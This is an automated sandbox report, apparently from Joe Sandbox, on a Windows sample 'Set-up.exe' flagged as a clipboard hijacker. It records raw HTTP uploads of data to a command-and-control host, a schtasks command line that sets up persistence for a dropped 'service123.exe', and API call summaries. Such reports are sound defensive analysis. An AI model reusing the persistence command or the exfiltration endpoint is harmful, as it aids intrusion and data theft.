Oct 1, 2024 15:48:17.452450037 CEST	4944	OUT	Data Raw: 58 bb 04 1a ba 66 8c d5 5a 65 2f ce 11 71 5b f0 8c 0c d7 b7 1d 2a f3 99 f0 5d f0 64 92 a7 d2 29 5d ad 9a 57 36 81 57 ad ba b7 99 48 99 e0 5c 8f 4f ae f5 07 3b 30 25 b9 ae d4 d1 a7 18 e8 27 05 ae d0 c1 88 f1 0a d7 49 7e e1 2a 6f e7 69 fe a9 11 1b Data Ascii: XfZe/q[]d)]W6WH\O;0%'I~oi]@p[A]rXbn-p\|4LT8QN>eYHWmC%_Z<C/b~!7gz/SIcf9%kI+$nZ.Jdl8
Oct 1, 2024 15:48:17.452620983 CEST	7416	OUT	Data Raw: 86 bc be ce 8c 35 f6 a0 14 c9 a0 89 24 50 73 7b 24 e9 45 2c fc bb 9f 9a 5d 3a d9 4a e8 90 34 4d 4d 6f 35 13 f1 c8 11 da 48 71 de e1 88 f4 8f 6a 53 ad 22 2f 82 9a aa a8 73 f5 2b 09 0c 0a 97 c8 46 78 7f 54 da 03 ec 6c a4 d1 97 f7 db ed 07 c3 30 27 Data Ascii: 5$Ps{$E,]:J4MMo5HqjS"/s+FxTl0'BC.9T'>Nw\JW#HY}2dANOJahGeoUVLD4}VJ5jy.r./b+gJt+:uu>C<
Oct 1, 2024 15:48:17.452682972 CEST	2472	OUT	Data Raw: 04 91 f0 bd 39 09 89 33 95 c9 83 fd 16 ea 90 fc bb ec 8f 4a 36 6e c8 7f 61 4c 5e 85 cb 8d bb 40 d6 b6 5e 83 a8 89 5b 9d 20 77 60 bb 56 31 89 a3 a0 19 25 67 70 2e d7 8f ba 8c 58 7d 70 65 88 e4 f6 8c a7 7a 12 a5 bb 54 3d a0 e2 e3 8b 7f 35 90 2d fe Data Ascii: 93J6naL^@^[ w`V1%gp.X}pezT=5-ul#s#0.bsnO)n<9I(9ypuiB^Zk?uN&X]^&J\r#jUa@b{gG#Q,htrwcl8XV"//tH0
Oct 1, 2024 15:48:17.452804089 CEST	2472	OUT	Data Raw: 14 45 ce 62 16 cc 70 4a 24 d9 fa 50 db 15 fb 18 ae 0e c8 01 aa 1e 55 c9 69 9a d3 4a d3 86 97 6e d3 75 2d c2 7c 8f 53 cc d9 a0 8f 76 f9 c2 ce e7 a0 0f be 04 85 26 34 5f c2 8d da 23 25 e6 1b 64 4b 07 29 03 1e 0a ea a8 65 c4 c6 be 46 21 db 4b 98 22 Data Ascii: EbpJ$PUiJnu-\|Sv&4_#%dK)eF!K"2d:ySF\|sy4BF\/.T.Px\|,yR-o#oS`Jt4.#>P-s2*ZmEGL9J_I.}Z+3d>0v2kK
Oct 1, 2024 15:48:17.457138062 CEST	2472	OUT	Data Raw: 5a 3d ec 01 00 c2 d2 bd 6e ab aa 8d d0 6c 0f 18 97 72 ea 61 80 0f a0 53 9d ed 0c f5 68 b6 cc 1d ba 29 f0 4e b4 13 e3 b1 a7 ba 6b 03 df 83 d3 de 4f 64 7e af d0 2f 05 f2 38 63 4c 8d 14 fc de 26 cc 22 4c c9 2b fe 0d ce fe b8 f3 b1 af e1 a3 3a a6 7e Data Ascii: Z=nlraSh)NkOd~/8cL&"L+:~>6$<}%GW:w+D:M/rci,"y0j+NW8E ~WDl)/8lOkzJRk2W 6j+E\'i
Oct 1, 2024 15:48:17.457216978 CEST	2472	OUT	Data Raw: 24 7f aa b0 5b e0 b1 2a e8 b9 a3 31 9e da b7 04 3e de 16 d1 78 26 c3 f1 12 ae af d0 1a 70 13 9f 10 6a c2 49 f3 3a 6d de 17 da ae f3 5c 25 67 56 e1 2c 9d 9e 06 0b 9a 3f 6d 76 40 0c a4 18 8e 7f 38 86 f6 71 67 6e f2 9b ba 79 aa 32 b9 80 44 1d 14 c5 Data Ascii: $[*1>x&pjI:m\%gV,?mv@8qgny2D[@D:{+"U6[YzQ@D$$qj\|1]a4m~Sdg[.{mre,9bG-tQgTdc!i\H']AqiF=T
Oct 1, 2024 15:48:18.457456112 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Tue, 01 Oct 2024 13:48:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.9	49709	185.244.181.140	80	7652	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:48:21.651643038 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary50062139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 34443 Host: elevenvx11pn.top
Oct 1, 2024 15:48:21.651741028 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 35 30 30 36 32 31 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 58 75 67 Data Ascii: ------Boundary50062139Content-Disposition: form-data; name="file"; filename="Xugujoj.bin"Content-Type: application/octet-stream)`%dp#Ag;g)8C-Y-Jq\|Br>s3/\|$i}`
Oct 1, 2024 15:48:21.656898022 CEST	1236	OUT	Data Raw: 41 e8 ee 99 44 a9 04 99 88 23 d1 ea c9 66 65 47 39 36 a7 98 0b e7 7b cd bc 7c 3e 0b c1 38 c5 30 51 19 6c a9 ad 3b c2 03 19 af 07 26 41 3b f8 03 df e6 64 ca 26 fc 78 ad 94 56 f0 a3 06 73 94 07 e9 a5 a7 44 d9 22 07 da 58 1b 63 ba f0 c8 33 1d c8 85 Data Ascii: AD#feG96{\|>80Ql;&A;d&xVsD"Xc38Llo~yzHozR\|G-7)yua5oG8+2GPE?D@!P2S5OdG4sY&2X\LL':!s{okB/vS&*GL
Oct 1, 2024 15:48:21.656929016 CEST	4944	OUT	Data Raw: bc b4 0d 12 0b 46 d7 75 ec 2d 6d b1 00 98 3b f5 bd 7b 83 e5 f9 1a 2f 8f db 79 26 c2 d0 8b 54 24 d5 29 34 4e 81 1d 23 11 79 63 fa 42 36 72 85 9d 4a a1 41 1a 26 3d d7 09 70 44 2a 3b bf 48 02 75 88 38 1b 88 e3 f6 35 c3 66 d0 c4 4d 1c f9 ae 4c ba e6 Data Ascii: Fu-m;{/y&T$)4N#ycB6rJA&=pD*;Hu85fML6V{~lT]%rTK33"r(COhP9<bECnz`$BH;j!;YYrQsRgO}!HdjehQ\|`j
Oct 1, 2024 15:48:21.656944990 CEST	2472	OUT	Data Raw: 59 75 b9 31 43 67 fe f7 ec d5 70 c6 84 34 a1 9f 9c 7d 65 0a 08 ea e3 c3 3d 48 88 11 7c 1e 57 da 40 6b 5a da 78 99 54 36 79 d9 95 5d de fb cc 77 dc 1c c7 69 73 c7 72 67 52 9a 95 44 d5 44 a4 68 09 84 f1 08 5e d1 54 b5 72 cf 7a d9 db d9 96 5a 05 f3 Data Ascii: Yu1Cgp4}e=H\|W@kZxT6y]wisrgRDDh^TrzZnK"S/=,m]Yu)cMehx}j)TG6Cg)4hy9"ktbc.=JJla,*L'L%pJNyP8%zWi"+<7V=n[#p4n2
Oct 1, 2024 15:48:21.657002926 CEST	2472	OUT	Data Raw: 53 4a 8f 9a f2 3f cb 21 4c 58 61 ab 61 b5 5e e9 6a 1b 8f 59 35 ed 0a 3e f9 76 6c 50 63 ba c5 b9 f0 aa 17 ab 92 9c 0f 74 7f ef 7e fe 3a 10 eb 0f 3f 0f 7a f6 d6 f3 e3 fd 2b b9 a6 0f 7a 11 5c cc d1 b0 04 52 6e fa db b0 ba f9 aa 37 e8 ea dd 12 ab e2 Data Ascii: SJ?!LXaa^jY5>vlPct~:?z+z\Rn7zqu,n/dHv\|oc;-J1*R7P%TqB:6fhQ8'J.QBj3)r^3_pni{<?IPg{J@6vMe
Oct 1, 2024 15:48:21.657040119 CEST	4944	OUT	Data Raw: 06 84 5a bf 6e 3e 3d 6b 42 2d 30 e8 e2 07 74 5b 93 8c e3 c1 c5 21 66 b2 aa 5a 77 9c 27 ec fe 49 65 56 d7 57 1e a0 12 7a 3c 74 2e 1f 7c 61 c7 ec 40 65 62 c8 8b d9 fd c2 a4 74 29 9a 21 3d 0a 7f 4b fa 80 aa ba e5 d0 08 e2 8a 31 8f 68 23 42 c6 4f 4d Data Ascii: Zn>=kB-0t[!fZw'IeVWz<t.\|a@ebt)!=K1h#BOM(\|xoVOb:xXCH@o,l*=b6dw3A!d#2 -QdqbND0Fq%v t,VEV~#[x{9tgB DPcGylG\|MtCN
Oct 1, 2024 15:48:21.657083035 CEST	2472	OUT	Data Raw: f3 3f 48 b2 db 89 eb 7c 75 7d 64 d6 56 0c ec 08 8d 89 25 fa 9c 24 8c 86 3e c0 c0 97 62 b8 31 35 2e 52 2e 59 70 d2 df b2 27 a1 69 8d 65 44 bd 57 98 38 99 4a 64 7e 62 6e 36 69 15 c5 b7 68 4e 60 df 0b 0e 3a 19 c6 36 f4 e6 48 af e4 3d 89 3d 16 61 28 Data Ascii: ?H\|u}dV%$>b15.R.Yp'ieDW8Jd~bn6ihN`:6H==a(]xNM@BAb>_X #uSEG;`1rNCs7VVgjSp `*t@`jGmC;o7^1L`}~O+y]&V
Oct 1, 2024 15:48:21.657104015 CEST	2472	OUT	Data Raw: b6 f9 91 b0 a8 87 91 59 9b c0 e1 48 59 f8 e6 ab f8 e0 c8 4a 35 23 75 01 a8 8f 66 1a 47 48 85 00 86 8b 3b b9 5c 4c 31 36 75 a2 ae b6 aa 8f 22 0e 65 6e 73 4b 89 65 9a 00 bc ad 0b ad b6 34 a3 72 37 8f 1e 4c ec 56 4d bd 03 5b bd ad c6 2f b1 37 53 b4 Data Ascii: YHYJ5#ufGH;\L16u"ensKe4r7LVM[/7Sa%i%4+V@oDBtoPg:w3-~. <0M~oc!?6_U{X4wx}RJ%OJL/J
Oct 1, 2024 15:48:21.657130957 CEST	2307	OUT	Data Raw: 21 50 6f b9 f3 6b ca 0a 42 e9 13 0f 7c db c0 fc 8a 93 8f e5 e3 4e 5a e8 e9 55 20 58 eb 9a 61 69 4f 7c 6d a3 f2 7a 29 37 09 9d 7b 10 2c 29 94 aa 5e 7f 5c 8a d9 71 b1 58 eb 70 cc ec 72 15 cb de 94 f7 14 b7 b3 12 2b 4a 6d 38 d7 54 3f dc f6 20 0b 13 Data Ascii: !PokB\|NZU XaiO\|mz)7{,)^\qXpr+Jm8T? :o8O(\|R&N4Bb{WVOxrfl}[VqXrbO.Tu#};qF{lTX)FG Bo\|eKLSre*N"
Oct 1, 2024 15:48:22.466562033 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Tue, 01 Oct 2024 13:48:22 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Target ID:	0
Start time:	09:48:03
Start date:	01/10/2024
Path:	C:\Users\user\Desktop\Set-up.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Set-up.exe"
Imagebase:	0x1000000
File size:	10'006'016 bytes
MD5 hash:	BB85C40120DAC356BFC311F4774D3439
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000000.00000003.1976708415.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:49:05
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\service123.exe"
Imagebase:	0x660000
File size:	314'617'856 bytes
MD5 hash:	3FFF09206AC36D06CF8352458CA5573E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:49:05
Start date:	01/10/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Imagebase:	0x650000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:49:05
Start date:	01/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff70f010000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:49:07
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x660000
File size:	314'617'856 bytes
MD5 hash:	3FFF09206AC36D06CF8352458CA5573E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:50:02
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\service123.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\/service123.exe
Imagebase:	0x660000
File size:	314'617'856 bytes
MD5 hash:	3FFF09206AC36D06CF8352458CA5573E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	61.1%
Total number of Nodes:	72
Total number of Limit Nodes:	3

Executed Functions

Function 0066116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 006611B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00661238
__p__acmdln.MSVCRT ref: 00661261
malloc.MSVCRT ref: 006612EB
strlen.MSVCRT ref: 00661323
malloc.MSVCRT ref: 0066132E
memcpy.MSVCRT ref: 00661344
GetStartupInfoA.KERNEL32 ref: 00661433

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: 498edc76774436a7c1be858c2270fa8214f51dc779034323a6bf17acd895c81e
Instruction ID: e40bf30f069c43039f1cf5d0498bf7fb32a810a7a82dc5e9033147aa6249fdf6
Opcode Fuzzy Hash: 498edc76774436a7c1be858c2270fa8214f51dc779034323a6bf17acd895c81e
Instruction Fuzzy Hash: 13819D71E082018FDB10DFA5D9903AABBE3FB46308F08452DD9859B311D7B5A94ADB92

Function 6C9414B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 6C9414CD
_exit.MSVCRT ref: 6C94151A
_write.MSVCRT ref: 6C94156A
_close.MSVCRT ref: 6C941579

Strings

CONOUT$, xrefs: 6C9414C6
@, xrefs: 6CA14AB1
terminated, xrefs: 6C941540

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: dd3ad7e67fafe075b07c377e873cdb9dd12f7467826bebcdc6e1320929ca2410
Instruction ID: 03311a9777d688cde0d934c01fc97999c4d67d7726b9d9b95e0a35ecab63bb49
Opcode Fuzzy Hash: dd3ad7e67fafe075b07c377e873cdb9dd12f7467826bebcdc6e1320929ca2410
Instruction Fuzzy Hash: 74414AB09083059FDB00DFB9C4446AEBBF4AF49318F11CA2DE8A9D7A50E334D555CB56

Function 006615B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_open.MSVCRT ref: 006615CD
_exit.MSVCRT ref: 0066161A
_write.MSVCRT ref: 0066166A
_close.MSVCRT ref: 00661679

Strings

@, xrefs: 00668341
CONOUT$, xrefs: 006615C6
terminated, xrefs: 00661640

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: _close_exit_open_write
String ID: terminated$@$CONOUT$
API String ID: 28676597-491099378
Opcode ID: e10ccc0ef651675efd9ded8ce7e99fd50e426d628426fc0576997d12feb09e0d
Instruction ID: b332003965f4403baa05447dd077df7a1b70ab05727e9265f7db8b81182b920c
Opcode Fuzzy Hash: e10ccc0ef651675efd9ded8ce7e99fd50e426d628426fc0576997d12feb09e0d
Instruction Fuzzy Hash: 3F4149B0908301DFDB00DFB9C84466EBBE6AB89314F048A2DE899E7350E775D845CB56

Function 006681E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,0066138E,?,?,00006EA2,0066138E), ref: 00668271
GetProcAddress.KERNEL32 ref: 0066828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0066138E,?,?,00006EA2,0066138E), ref: 0066829D

Strings

NrIpUDVFuuHZveDEuHZveDEtrIh.dll, xrefs: 0066824A
Failed to get function address. Error code: %d, xrefs: 006682E0
qMRrfMkjAmRXvCNjtHam, xrefs: 0066827E

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Failed to get function address. Error code: %d$NrIpUDVFuuHZveDEuHZveDEtrIh.dll$qMRrfMkjAmRXvCNjtHam
API String ID: 145871493-370558357
Opcode ID: 7a92069b35fbef8bb7d7a5e94fe8bacdf74d7e5a2ce2f55be871bfac704bea8f
Instruction ID: 15c94af8f2ac410faeae45b02f4101655e216453c08ea16e3517ff47ec043789
Opcode Fuzzy Hash: 7a92069b35fbef8bb7d7a5e94fe8bacdf74d7e5a2ce2f55be871bfac704bea8f
Instruction Fuzzy Hash: 7231A272909600EFDB00AFB4DD5949EBFF6FB89300F009A28E845D7200EBB6D545CB96

Function 00668230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 90
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,0066138E,?,?,00006EA2,0066138E), ref: 00668271
GetProcAddress.KERNEL32 ref: 0066828B
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,0066138E,?,?,00006EA2,0066138E), ref: 0066829D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0066138E,?,?,00006EA2,0066138E), ref: 006682BD
GetLastError.KERNEL32 ref: 006682DA
FreeLibrary.KERNEL32 ref: 006682F3

Strings

Failed to load DLL. Error code: %d, xrefs: 006682C3
NrIpUDVFuuHZveDEuHZveDEtrIh.dll, xrefs: 0066824A
qMRrfMkjAmRXvCNjtHam, xrefs: 0066827E

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: Library$ErrorFreeLast$AddressLoadProc
String ID: Failed to load DLL. Error code: %d$NrIpUDVFuuHZveDEuHZveDEtrIh.dll$qMRrfMkjAmRXvCNjtHam
API String ID: 1397630947-1619877962
Opcode ID: 9fa18d68f6226278df69048a2449a93d8b19451afa9c6f45c9a913ffa1d9f862
Instruction ID: 5278eca57d6c60f7f03d3b7b7cba2fff5de8ced1759d1fea84e3dd10d090349b
Opcode Fuzzy Hash: 9fa18d68f6226278df69048a2449a93d8b19451afa9c6f45c9a913ffa1d9f862
Instruction Fuzzy Hash: 6211D372904600AFDB00AFB4DE5559EBFA7EB46304F108A28D855D7240FFB6E601DA92

Function 006613C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00661238
__p__acmdln.MSVCRT ref: 00661261
malloc.MSVCRT ref: 006612EB
strlen.MSVCRT ref: 00661323
malloc.MSVCRT ref: 0066132E
memcpy.MSVCRT ref: 00661344
_amsg_exit.MSVCRT ref: 006613EA
_initterm.MSVCRT ref: 0066140C

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2053141405-0
Opcode ID: 2a789c39b14ca872aed6123b21f876012092b621dc02c484ea6c623040463b42
Instruction ID: 3316291255545c6d3a9c48170b06bffcf3c41cbb75c377384fd7584cb608c7e0
Opcode Fuzzy Hash: 2a789c39b14ca872aed6123b21f876012092b621dc02c484ea6c623040463b42
Instruction Fuzzy Hash: 614136B0E083018FDB50EF65E89035DBBF2BB4A304F14592DD9859B311DBB5A946CF82

Function 006611A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 006611B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00661238
__p__acmdln.MSVCRT ref: 00661261
malloc.MSVCRT ref: 006612EB
strlen.MSVCRT ref: 00661323
malloc.MSVCRT ref: 0066132E
memcpy.MSVCRT ref: 00661344
_amsg_exit.MSVCRT ref: 006613EA
_initterm.MSVCRT ref: 0066140C

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_amsg_exit_inittermmemcpystrlen
String ID:
API String ID: 2230096795-0
Opcode ID: 30cf4e00a79bc58b1b4aa9ae66cabb012f92c952c55734f2202666fe1ee2f009
Instruction ID: 220e7620a05fe95e81b7ac62985ca6fa51fd604c4e4ffcfe77d581dd9a11140b
Opcode Fuzzy Hash: 30cf4e00a79bc58b1b4aa9ae66cabb012f92c952c55734f2202666fe1ee2f009
Instruction Fuzzy Hash: 27412AB0E083018FDB50EF65E89435EBBF2BB49348F08552DD8859B350DBB1A946CB91

Function 00661160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 006611B7
SetUnhandledExceptionFilter.KERNEL32 ref: 00661238
__p__acmdln.MSVCRT ref: 00661261
malloc.MSVCRT ref: 006612EB
strlen.MSVCRT ref: 00661323
malloc.MSVCRT ref: 0066132E
memcpy.MSVCRT ref: 00661344
GetStartupInfoA.KERNEL32 ref: 00661433

Memory Dump Source

Source File: 00000005.00000002.2635506666.0000000000661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00660000, based on PE: true

Associated: 00000005.00000002.2635491166.0000000000660000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635521140.000000000066A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635535093.000000000066E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2635548897.0000000000671000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_660000_service123.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdlnmemcpystrlen
String ID:
API String ID: 1672962128-0
Opcode ID: ac3d24be96cf968cad19f0ddd89f355e26c8ed3cba7729e7a98a5f81742200f9
Instruction ID: 8e246c26ad2b4d6dbb84f28e0e10753f0676d4b91be21a583c3f06736c3ffc81
Opcode Fuzzy Hash: ac3d24be96cf968cad19f0ddd89f355e26c8ed3cba7729e7a98a5f81742200f9
Instruction Fuzzy Hash: E2516CB1E083009FDB50DFA9E89075ABBF2FB4A308F18552DD945DB310DBB1A946CB91

Function 6CA14230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenMutexA.KERNEL32 ref: 6CA14259
CreateMutexA.KERNELBASE ref: 6CA142A3
Sleep.KERNELBASE ref: 6CA142BF
GetClipboardSequenceNumber.USER32 ref: 6CA142C8

Strings

CuDNObfgqmczoBnKhtUp, xrefs: 6CA14242, 6CA1428C

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
